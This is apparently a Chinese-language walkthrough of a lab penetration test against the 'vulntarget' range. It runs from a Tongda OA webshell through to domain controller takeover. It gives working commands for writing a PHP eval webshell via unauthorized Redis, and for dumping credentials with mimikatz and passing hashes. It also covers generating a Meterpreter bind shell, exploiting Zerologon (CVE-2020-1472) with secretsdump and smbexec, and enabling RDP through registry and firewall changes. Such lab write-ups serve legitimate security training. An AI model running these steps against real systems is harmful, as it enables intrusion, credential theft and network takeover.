1、通过信息搜集,发现目标有一个外网访问的通达OA系统
2、通达OA的漏洞是非常多的,这里利用大佬写好的通达OA一键getshell工具
成功获取webshell
3、连接webshell,上传cs马儿到服务器
4、执行获取主机权限
成功上线
5、通过Ladon插件发现系统有2张网卡,有一个内网ip,10.0.20.98
6、因为目标是win7系统,可以直接抓取明文密码
7、使用ladon插件开启目标3389桌面
使用socket代理
使用proxifier代理软件,成功连接入目标内网
8、使用抓取到的远程登陆目标服务器
上传fscan到目标服务器,扫描内网网段,发现内网中有一台服务器有redis未授权访问漏洞
9、因为此时我们使用了socket代理,我们可以直接访问到目标内网,发现可以直接连接目标redis
10、通过对该ip进行端口扫描,发现该ip存在l.php探针页面
找到了绝对路径页面
C:/phpStudy/PHPTutorial/WWW
因为知道了目标网站绝对路径,可以直接写入webshell进行连接
1.
config set dir C:/phpStudy/PHPTutorial/WWW
2.
set zznb "nnn<?php @eval($_POST['zznb']);?>nnn"
3.
config set dbfilename zznb.php
4.
save
使用御剑进行连接,成功连接
11、因为现在我们是在外网的服务器上,想要在本地上线内网的服务器,我们需要将2层内网的数据转发到第一层的外网服务器进行转发上线,这里有2种办法,接下来我将介绍2种办法
(1)cs设置端口转发
(2)使用mimikatz抓取hash进行445端口横向碰撞
官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons连接后,子Beacon从父Beacon获取到任务并发送。因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
webshell先上传mimikatz
执行以下命令
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> pass.txt
将执行后的pass.txt文件下载下来
cs上新增一个监听
转到视图,选择目标,使用psexec64
将mimikatz抓取到的hash填入,选择smb 监听器和对应会话
等待执行完成之后二层内的ip即可上线
运行成功后外部可以看到∞∞这个字符,这就是派生的SMB Beacon。这种Beacon在内网横向渗透中运用的很多。在内网环境中可以使用ipc $生成的SMB Beacon上传到目标主机执行,但是目标主机并不会直接上线的,需要我们自己用链接命令(link )去连接它。
12、在二层内网中使用命令ipconfig,发现目标开启使用的是双网卡,还有第三层10.0.10.0/24段的地址
上传fscan扫描,发现该网段存在10.0.10.110地址,且该ip为域控服务器
13、msf上线一层服务器
msf使用代理上线二层服务器
添加路由,设置代理,arp获取到内网同网段IP,一次使用如下命令
run post/multi/manage/autoroute
use auxiliary/server/socks_proxy
run
sessions -i 1
arp a
代理之后远程的服务器上msf可直接访问到第二层服务器
现在使用获取第一层外网服务器的代理上线二层服务器
如下命令生成正向连接马儿
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4545 -f exe >4545.exe
msf执行如下命令
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
exploit
在cs上线的地方执行如下命令
shell C:\phpStudy\PHPTutorial\WWW\4545.exe
成功上线第二层服务器
14、定位域控,得到域控ip
run post/windows/gather/enum_domain
得到域控IP:10.0.10.110
账号:win2019
域:vulntarget.com
再次添加win2016的路由,这样就可以访问到域控
run post/multi/manage/autoroute
测试代理是否成功
bg
proxychains4 nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
15、使用域内大杀器获取第三层服务器权限
直接使用CVE-2020-1472(域内提权)
proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py win2019 10.0.10.110
此时密码已经置空
再使用impactet来进行下一步的操作
获取域控hash
proxychains4 python3 secretsdump.py vulntarget.com/win2019\$@10.0.10.110 -no-pass
得到administrator的hash
aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15
直接就拿下域控
proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
开启远程桌面
第一步
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
第二步
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
第三步
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
将administrator的hash值放到cmd5上进行破解
直接进行远程登陆
proxychains4 rdesktop 10.0.10.110
账号:vulntarget.com\administrator
密码:Admin@666
最终拿下域控!!!!